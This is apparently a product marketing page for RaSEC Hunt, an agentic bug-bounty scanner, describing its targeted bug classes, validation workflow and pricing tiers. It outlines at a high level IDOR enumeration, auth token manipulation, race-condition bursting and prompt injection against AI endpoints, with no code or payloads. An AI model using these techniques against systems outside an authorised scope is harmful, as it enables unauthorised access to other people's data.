Skip to main content
RaSEC
Sign inStart hunting

Hunt surfaces

Bounties

High-signal bug classes. Validated findings. Submission-ready output. The full agentic bounty execution layer.

Start hunting free →How it works

Bug classes the agent hunts

IDORAuth bypassPriv escalationRace conditionPrompt injectionMisconfigAccess controlSession abuse
+116%IDOR report growth over 5 years on HackerOne
+540%Prompt injection growth YoY (HackerOne 2025)
70-82%Hunters already using AI tools
$81M+Annual HackerOne payouts, 13% YoY growth

Philosophy

Narrow focus. Higher payout rate.

Most scanners try to cover everything and end up confirming nothing. They generate hundreds of low-confidence alerts across XSS, SQLi, open redirects, and outdated libraries — the kind of report that takes more time to triage than it does to submit.

RaSEC Hunt focuses on a narrower set of bug classes deliberately: access control failures, auth bypasses, and privilege escalation bugs. These are the categories that reliably produce $500 to $10,000+ payouts on major programs, require reasoning about application logic (not just payload matching), and benefit most from an agentic workflow.

Every finding the agent surfaces has gone through a mandatory validation gate: deterministic reproduction, request/response evidence, and a clear explanation of the impact. Nothing is listed as a "potential" issue without a working reproduction chain.

The result is a smaller set of findings that are actually submittable — not a noise report that requires a manual review pass before you can do anything with it.

Priority tracks

Deep dive by bug class

Highest payout

Access control and IDOR

The highest-growth bug class on HackerOne

IDOR report growth on HackerOne hit +116% over 5 years and +29% year-over-year (HackerOne 2025). Horizontal and vertical access control failures are consistently among the highest-impact finding categories in modern bug bounty programs. IDOR on user IDs, object references, or API parameters — the fundamental pattern of one user accessing another user's data without authorisation — remains underexplored by most automated tools because it requires understanding the application's permission model, not just firing payloads.

RaSEC Hunt builds a session-aware model of the target, enumerates object references across authenticated user contexts, and tests cross-context access systematically. If it finds a working IDOR, it generates the reproduction request and validates the response diff before promoting the finding.

Available: Pro + Elite

High signal

Authentication bypass

Token manipulation and session confusion

Authentication bypass bugs — weak JWT signing, predictable tokens, account takeover via password reset flows, or session state confusion — are high-severity by definition and frequently critical in bounty programs. They require understanding the auth flow, not just brute-forcing parameters.

The agent traces auth flows, extracts token patterns, tests header manipulation and role escalation vectors, and validates bypass conditions with a clean before/after evidence bundle. Every step in the auth test chain is logged.

Available: Pro + Elite

Elite only

Race conditions

TOCTOU windows and parallel request exploitation

Race conditions in financial flows, inventory systems, or coupon redemption are notoriously hard to find manually. The time-of-check-time-of-use window is often measured in milliseconds. Elite tier uses parallel request bursting to probe these windows systematically across transactional endpoints.

The agent identifies idempotency-sensitive endpoints, issues synchronized parallel bursts, and validates non-idempotent responses as evidence of the race condition. Full HTTP timing and response delta included in the PoC.

Available: Elite

AI targets

Prompt injection

AI endpoint exploitation

As more applications embed LLM-powered features (chat assistants, document summarizers, code helpers), prompt injection has become a legitimate high-severity class in major programs. Injecting adversarial instructions through user-controlled input into an AI processing pipeline can result in data exfiltration, SSRF, or privilege escalation.

Elite tier agents test AI-powered endpoints for instruction injection, context leakage, and unsafe tool delegation chains — patterns most scanners cannot evaluate at all.

Available: Elite

Reference

Bug class severity matrix

Approximate payout ranges from public data. Actual bounties vary by program and impact.

Bug classSignal levelRequired tierReproduction mode
IDOR (horizontal)Critical priorityProAutomated
Auth bypassCritical priorityProAutomated
Privilege escalationHigh priorityProAutomated
Race conditionHigh priorityEliteAutomated
Prompt injectionHigh priorityEliteSemi-auto
Misconfig / headerLow priorityFreeHeuristic

Execution workflow

From surface to submission

Define the hunt surface

Paste program scope. The agent maps auth flows, API endpoints, and object reference patterns before testing anything.

Agent executes

Systematic traversal of the target surface across all supported bug classes for your tier. Live activity streamed to your dashboard.

Validation gate

Every potential finding goes through deterministic reproduction. Three attempts. Full request/response logged. No false-positive promotion.

PoC assembled

Confirmed findings get a platform-ready PoC report: summary, CVSS, reproduction steps, curl command, evidence diff. Copy. Paste. Submit.

No inflated claim counts. Every finding in the output has a working reproduction chain, a confirmed response diff, and a formatted submission report. If the agent cannot reproduce it, it stays pending.
RaSEC Platform

Start your first agentic hunt today

IDOR and auth bypass finding
Deterministic reproduction
PoC reports for your platform
Start hunting free →Compare plans
No credit cardCancel anytimeFree forever tier